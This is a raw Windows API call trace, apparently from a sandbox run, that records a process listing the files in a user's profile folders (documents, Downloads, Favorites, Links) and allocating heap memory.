1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8588a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x691c4140, ftCreationTime.dwHighDateTime=0x1d855c4, ftLastAccessTime.dwLowDateTime=0xd8965250, ftLastAccessTime.dwHighDateTime=0x1d87959, ftLastWriteTime.dwLowDateTime=0xd8965250, ftLastWriteTime.dwHighDateTime=0x1d87959, nFileSizeHigh=0x0, nFileSizeLow=0x1a01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dr8UIj1jmG.docx", cAlternateFileName="DR8UIJ~1.DOC")) returned 1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f52b60, ftCreationTime.dwHighDateTime=0x1d83c36, ftLastAccessTime.dwLowDateTime=0x97580400, ftLastAccessTime.dwHighDateTime=0x1d892ea, ftLastWriteTime.dwLowDateTime=0x97580400, ftLastWriteTime.dwHighDateTime=0x1d892ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kLC6o4xsmRx_iA iEAy2.docx", cAlternateFileName="KLC6O4~1.DOC")) returned 1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd03d810, ftCreationTime.dwHighDateTime=0x1d8683b, ftLastAccessTime.dwLowDateTime=0x14e91f60, ftLastAccessTime.dwHighDateTime=0x1d89d01, ftLastWriteTime.dwLowDateTime=0x14e91f60, ftLastWriteTime.dwHighDateTime=0x1d89d01, nFileSizeHigh=0x0, nFileSizeLow=0x16f92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LIaaFON99laH9NU_j.xlsx", cAlternateFileName="LIAAFO~1.XLS")) returned 1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd829730, ftCreationTime.dwHighDateTime=0x1d89cdc, ftLastAccessTime.dwLowDateTime=0x8077130, ftLastAccessTime.dwHighDateTime=0x1d89cec, ftLastWriteTime.dwLowDateTime=0x8077130, ftLastWriteTime.dwHighDateTime=0x1d89cec, nFileSizeHigh=0x0, nFileSizeLow=0x1233b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M-_W92CtTuHd9hF.xlsx", cAlternateFileName="M-_W92~1.XLS")) returned 1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fa890e0, ftCreationTime.dwHighDateTime=0x1d82093, ftLastAccessTime.dwLowDateTime=0x1d38f160, ftLastAccessTime.dwHighDateTime=0x1d86bea, ftLastWriteTime.dwLowDateTime=0x1d38f160, ftLastWriteTime.dwHighDateTime=0x1d86bea, nFileSizeHigh=0x0, nFileSizeLow=0x14019, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MuVmmckS_6uXC.pptx", cAlternateFileName="MUVMMC~1.PPT")) returned 1 [0180.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0180.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0180.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0180.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a404d0 [0180.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0180.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0180.741] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eb38 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x2f5b18 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a403c8 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40580 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0180.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40370 | out: hHeap=0x2c0000) returned 1 [0180.741] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a404d0 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0180.741] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe2a8c0, ftCreationTime.dwHighDateTime=0x1d89af6, ftLastAccessTime.dwLowDateTime=0xb9e3fe50, ftLastAccessTime.dwHighDateTime=0x1d89f26, ftLastWriteTime.dwLowDateTime=0xb9e3fe50, ftLastWriteTime.dwHighDateTime=0x1d89f26, nFileSizeHigh=0x0, nFileSizeLow=0x9870, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N6jq6Ucc95w9.docx", cAlternateFileName="N6JQ6U~1.DOC")) returned 1 [0180.741] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0180.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eb38 [0180.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0180.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19789270, ftCreationTime.dwHighDateTime=0x1d82bca, ftLastAccessTime.dwLowDateTime=0x2b398910, ftLastAccessTime.dwHighDateTime=0x1d8753f, ftLastWriteTime.dwLowDateTime=0x2b398910, ftLastWriteTime.dwHighDateTime=0x1d8753f, nFileSizeHigh=0x0, nFileSizeLow=0xb8ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qCa-wrdfbpIzYp.docx", cAlternateFileName="QCA-WR~1.DOC")) returned 1 [0180.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62267ec0, ftCreationTime.dwHighDateTime=0x1d878ea, ftLastAccessTime.dwLowDateTime=0x42137560, ftLastAccessTime.dwHighDateTime=0x1d8929a, ftLastWriteTime.dwLowDateTime=0x42137560, ftLastWriteTime.dwHighDateTime=0x1d8929a, nFileSizeHigh=0x0, nFileSizeLow=0xcbd7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="riNXJCPkFg.pptx", cAlternateFileName="RINXJC~1.PPT")) returned 1 [0180.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2df1960, ftCreationTime.dwHighDateTime=0x1d897e2, ftLastAccessTime.dwLowDateTime=0x5ab20d50, ftLastAccessTime.dwHighDateTime=0x1d8a219, ftLastWriteTime.dwLowDateTime=0x5ab20d50, ftLastWriteTime.dwHighDateTime=0x1d8a219, nFileSizeHigh=0x0, nFileSizeLow=0xc41c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RN1rbBo1eqYMG_Q.xlsx", cAlternateFileName="RN1RBB~1.XLS")) returned 1 [0180.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10399150, ftCreationTime.dwHighDateTime=0x1d85163, ftLastAccessTime.dwLowDateTime=0x8cca3200, ftLastAccessTime.dwHighDateTime=0x1d89142, ftLastWriteTime.dwLowDateTime=0x8cca3200, ftLastWriteTime.dwHighDateTime=0x1d89142, nFileSizeHigh=0x0, nFileSizeLow=0x5f00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RUCPVLyvfQF00IxB1.xlsx", cAlternateFileName="RUCPVL~1.XLS")) returned 1 [0180.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x655f5690, ftCreationTime.dwHighDateTime=0x1d83d29, ftLastAccessTime.dwLowDateTime=0x66b790, ftLastAccessTime.dwHighDateTime=0x1d86ce2, ftLastWriteTime.dwLowDateTime=0x66b790, ftLastWriteTime.dwHighDateTime=0x1d86ce2, nFileSizeHigh=0x0, nFileSizeLow=0x18753, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tCNlSe zbuiw.pptx", cAlternateFileName="TCNLSE~1.PPT")) returned 1 [0180.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd44e3630, ftCreationTime.dwHighDateTime=0x1d8a37b, ftLastAccessTime.dwLowDateTime=0xd958d360, ftLastAccessTime.dwHighDateTime=0x1d8a3a8, ftLastWriteTime.dwLowDateTime=0xd958d360, ftLastWriteTime.dwHighDateTime=0x1d8a3a8, nFileSizeHigh=0x0, nFileSizeLow=0x14d99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WOYOdoVl_y_ELRl.ppt", cAlternateFileName="WOYODO~1.PPT")) returned 1 [0180.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab17870, ftCreationTime.dwHighDateTime=0x1d8733e, ftLastAccessTime.dwLowDateTime=0xfb5bdcf0, ftLastAccessTime.dwHighDateTime=0x1d874af, ftLastWriteTime.dwLowDateTime=0xfb5bdcf0, ftLastWriteTime.dwHighDateTime=0x1d874af, nFileSizeHigh=0x0, nFileSizeLow=0x15e7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wXPNYv.xlsx", cAlternateFileName="WXPNYV~1.XLS")) returned 1 [0180.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44e2210, ftCreationTime.dwHighDateTime=0x1d8a124, ftLastAccessTime.dwLowDateTime=0x49174cd0, ftLastAccessTime.dwHighDateTime=0x1d8a4d6, ftLastWriteTime.dwLowDateTime=0x49174cd0, ftLastWriteTime.dwHighDateTime=0x1d8a4d6, nFileSizeHigh=0x0, nFileSizeLow=0x13d0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xR3NLEX5cZvfg.pptx", cAlternateFileName="XR3NLE~1.PPT")) returned 1 [0180.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44e2210, ftCreationTime.dwHighDateTime=0x1d8a124, ftLastAccessTime.dwLowDateTime=0x49174cd0, ftLastAccessTime.dwHighDateTime=0x1d8a4d6, ftLastWriteTime.dwLowDateTime=0x49174cd0, ftLastWriteTime.dwHighDateTime=0x1d8a4d6, nFileSizeHigh=0x0, nFileSizeLow=0x13d0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xR3NLEX5cZvfg.pptx", cAlternateFileName="XR3NLE~1.PPT")) returned 0 [0180.742] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.742] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.742] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Downloads\\") returned="Downloads\\" [0180.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.743] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.743] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.743] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.743] PathFindFileNameW (pszPath="") returned="" [0180.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.743] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\*" (normalized: "c:\\users\\keecfmwgj\\downloads\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.743] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.743] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.743] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0180.743] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.743] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.744] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0180.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.744] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.744] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.744] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.744] PathFindFileNameW (pszPath="") returned="" [0180.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.744] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.744] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.744] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fe350, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.744] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a404d0 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x29dcde8 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40370 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40630 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40688 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2ae2eb8 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eb38 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2ae2f10 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0180.745] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x3b48b8 [0180.745] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec08 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ecd8 [0180.745] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec08 [0180.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0180.746] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0180.746] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.746] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.746] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Links\\") returned="Links\\" [0180.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.746] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.746] 